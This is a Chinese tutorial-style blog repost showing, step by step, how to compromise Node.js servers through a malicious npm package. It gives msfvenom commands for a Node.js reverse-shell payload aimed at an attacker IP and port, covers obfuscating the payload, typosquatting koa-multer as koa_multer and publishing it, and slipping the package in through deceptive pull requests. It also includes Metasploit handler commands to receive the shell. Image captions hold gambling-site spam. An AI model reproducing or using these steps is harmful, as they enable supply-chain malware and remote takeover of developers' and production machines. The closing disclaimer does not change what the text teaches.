原标题:我是这样黑进你Node.js生产服务器的

来源:HackingSexy

style=”font-size: 16px;”>https://zhuanlan.zhihu.com/p/43514079

TL,DR:

这篇文章讲述了从一个黑客的角度,以渗透前端项目为目标,从生成
payload,混淆,隐藏 payload,发布 npm,社会工程学提
PR,运行脚本,反向连接到攻击主机,最终主机拿到服务器 shell
的故事。

正片:

前端工程师的口头禅是啥?npm
install!

这个命令从 npm 仓库中下载一堆从项目
package.json 中声明的依赖,下载完依赖后,再下载依赖中 package.json
声明的依赖,下载完依赖的依赖后,再下载依赖中 package.json 声明的依赖中的
package.json 声明的依赖,下载完依赖后…………

然后下了一堆你都不知道从哪里来的 npm
包。

美高梅注册 1

美高梅注册 2

前端工程师的另一个口头禅是什么?npm run
dev!

嗯!界面显示 compile
successful!很完美的一次编译!你觉得是时候展示真正的技术了!

此时,在网线的另一端,一个黑客微微一笑:又有一个肉鸡上线了。

这中间都发生了什么?

生成 Payload

经验丰富的金鱼佬都知道,要钓鱼,是肯定要先做鱼钩的。黑客也要钓鱼,鱼钩是啥?在黑客的世界里,有一个鱼钩店,叫做
msfvenom,专治各种款(架)式(构),各种型(语)号(言)的鱼(机器)。msfvenom
是 metasploit 的一部分,集成在了 Kali 系统里面。在 Kali
的官网,有现成的虚拟机镜像,下载了就能用。

在 Kali 的 Terminal 里输入:

msfvenom -l | grep node

可以列出所有支持 Node.js 的
payload。这相当于到店里问:老板!我要买鱼钩!要能钓 Node.js
的那种!老板:好嘞!要哪款?

美高梅注册 3

美高梅注册 4

在这里,我们选择
nodejs/shell_reverse_tcp,其实业界最常用的 payload 是
meterpreter,但是这款鱼钩还没上市:

如何生成我们的 payload 呢,输入:

msfvenom -p nodejs/shell_reverse_tcp
LHOST=192.168.199.165 LPORT=5432 -o index.js

这里说一下配置的参数:

  • -p nodejs/shell_reverse_tcp 指的是我们要用
    nodejs/shell_reverse_tcp 这个 payload;
  • LHOST=192.168.199.165 指的是攻击主机的 IP
    地址,由于这次攻击是内网演示,所以用了内网 IP
    。公网攻击的话,就要配个公网 IP;
  • LPORT=5432 攻击主机这边的监听端口,payload
    运行后,被攻击方会尝试连接攻击主机的这个端口;
  • -o index.js 意思是输出到 index.js 这个文件中。

敲完命令之后,我们可以在当前目录拿到一个名为
index.js 的 payload,也就是我们刚买到的鱼钩。payload 很小很小,只有 803
字节。用

cat index.js

命令,可以看到 payload 长什么样。

美高梅注册 5

美高梅注册 6

这时候警觉的前端就会跳出来怼我:胸底,你这代码里又调用
cmd 又调用 /bin/sh,还把攻击 IP
和端口都暴露出来了,傻子才会运行你的代码哦?

别急嘛,好戏才刚刚开始。

混淆

传统的杀毒软件,是通过检测文件特定字符来确定病毒特征的,而通过修改特征码绕过杀毒软件的检测,我们称之为免杀。

而 Java
的变化,简直比海贼王里的路飞还要伸缩自如。

举个例子,一行简单的代码:

alert(1)

用 jsfuck
能把它变得连老妈都认不出来:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

当然我们不用
jsfuck,因为混淆过后的代码太大了。

前端喜欢用 UglifyJS
来压缩代码,但在这场景下,也许不是最优解。我们用 Java Obfuscator
Tool。

复制 payload,打开
https://obfuscator.io/,粘贴,根据你的口味选择需要添加的混淆方法,点击
Obfuscate,一道菜就完成了。

美高梅注册 7

美高梅注册 8

现在已经没有人类能读懂这段代码了,混淆任务完成。

隐藏 payload

npm
是共产主义的大粮仓,任何人都可以贡献自己的代码到 npm
上去。但是如何让别人下载我们的代码呢?这是一门高深的学问。

常规的思路是,做一个和正常 npm
包名字很像的包名,譬如 koa-multer,可以做一个
koa_multer,然后总有一些人会打错字,下载到包含 payload
的包。这是一个概率问题,下载 koa-multer 的总量越大,下载 koa_multer
的量也越大。

以 koa-multer 为例,我们先把代码 clone
下载下来。

git clone
https://github.com/koa-modules/multer.git

把我们生成的 payload
复制到项目路径下,并在 index.js 中引入这个文件。

把 package.json 和 README.md 里所有的
koa-multer 改成 koa_multer,并在 package.json 的 files 声明 payload
的文件名,我们就做好了一个带有 payload 的 npm 包。

拿到这个包,就可以发布到 npm
源了:

npm publish

为了演示,我在本地搭了一个 npm
服务器。

美高梅注册 9

美高梅注册 10

可以看到这个包和正确的 koa-multer
几乎一样。如果不深究源码,前端不会发现自己下载了一个错误的包。

美高梅注册 11

美高梅注册 12

接下来要做的事情是,等。就像钓鱼一样,需要耐心。

这时候警觉的前端工程师会跳出来怼我:你这包一看就知道是坑人的,我肯定不会蠢到安装这种包!

别急,还有其他方法。

另一个思路是,做一个通用的 npm 包,譬如能
log 出五彩斑斓颜色的包,然后去给其他的开源项目提 PR:

我帮你修复了问题 XXX,还加上了彩色 logger 的功能!

我们是在给开源社区做贡献呐!

当然,警觉的人会拒绝这个
PR。但这也没关系,提的 PR 多了,总会有人上钩的。

一个 npm 包被伪造不是问题,一个恶意的 PR
被不知名的项目 Approve
也不是问题。就像一个请求不能叫攻击,但是几百万的请求打过来的时候,你就知道
DDOS 有多可怕。

黑客完全可以把下载 npm
包,伪造代码并发布这段逻辑自动化。之后,就不仅仅是 koa_multer
的问题了,你需要提防 koa-multe,multer-koa,koa-multer-middleware
等等各种奇奇怪怪的 npm 包,还要区分”_”和”-“的区别,当然,也不仅仅是
koa-multer 这个包,其他所有的包都可以如法炮制。

就算再警觉,再小心,总有你注意不到的地方。就像刀剑不入的阿喀琉斯,也会有脚后跟中箭的一天。

另外,大多数 npm
包都是层级依赖关系,你能确保你的 package.json
中不可能声明有木马的包,但是你能确保你所依赖的包,这些包的作者,也和你一样警觉,不会大意?

黑客准备

黑客这边,需要准备好 handler。

在 Kali 系统中,输入:

msfconsole

进入 metasploit
的控制台。然后输入:

use exploit/multi/handler

使用 handler 模块。并在 handler
模块中设置 payload ,攻击主机 IP,攻击主机端口,并启动监听:

set payload nodejs/shell_reverse_tcp
set LHOST 192.168.199.165 set LPORT 5432 run

如图,反向TCP监听已经成功启动:

美高梅注册 13

美高梅注册 14

肉鸡上线

这时候,小白鼠跑了 koa_multer 里的 demo
代码!

美高梅注册 15

美高梅注册 16

黑客这边,马上能获得这个 shell
的会话:

美高梅注册 17

美高梅注册 18

在这里,黑客获得了启动该 Node.js
程序的用户权限,可以执行任何该用户允许执行的命令。举个例子,黑客想看被攻击主机的操作系统,查看
CPU 型号………

sw_vers # 查看操作系统

sysctl -n machdep.cpu.brand_string # 查看操作系统

美高梅注册 19

美高梅注册 20

如果这个程序部署到了生产环境服务器,那么黑客将能获得这个服务器的shell权限。

下一步干嘛?内网渗透,脱裤,种马,导流……

拿到 shell
真的可以为所欲为,只有你想不到,没有黑客做不到。

Done?

还没完呢,精彩还在后头。

npm 账号的弱口令问题

在 2017 年 7 月份,有人对 npm
的账号做了一次弱口令检测,检测结果是:

有弱口令问题账号所发布的 npm
包,占据了整站的 14%

由于 npm 包以相互依赖的形式存在,由这
14%包引发的安全问题,影响到其他的包,占据了整站的 54%

那就意味着,你每 npm install
两次,就会有一次安装到不安全的包。这不是危言耸听。大名鼎鼎
koa.js,发布的密码是
“password”;react、gulp等明星项目也深陷弱口令深渊。下面列举一些其他受弱口令问题影响的
npm 包,相信总有你熟悉的名字:

  1. debug
  2. qs
  3. yargs
  4. request
  5. chalk
  6. form-data
  7. cheerio
  8. gulp
  9. browserify
  10. bower
  11. mongoose
  12. electron
  13. normalize.css
  14. mysql

这么看来,npm
到现在都没发生过大规模的安全性问题,纯属是运气好……

所以,让我们祝愿 npm 永远幸运✨吧。

Note:本文旨在交流探讨,作者没有渗透过任何系统。如根据本文思想进行渗透,读者须自行承担风险和责任。作者不承担任何责任。

参考文档:

1.https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5

2.
https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md[返回搜狐,查看更多](http://www.sohu.com/?strategyid=00001%20)

责任编辑:

相关文章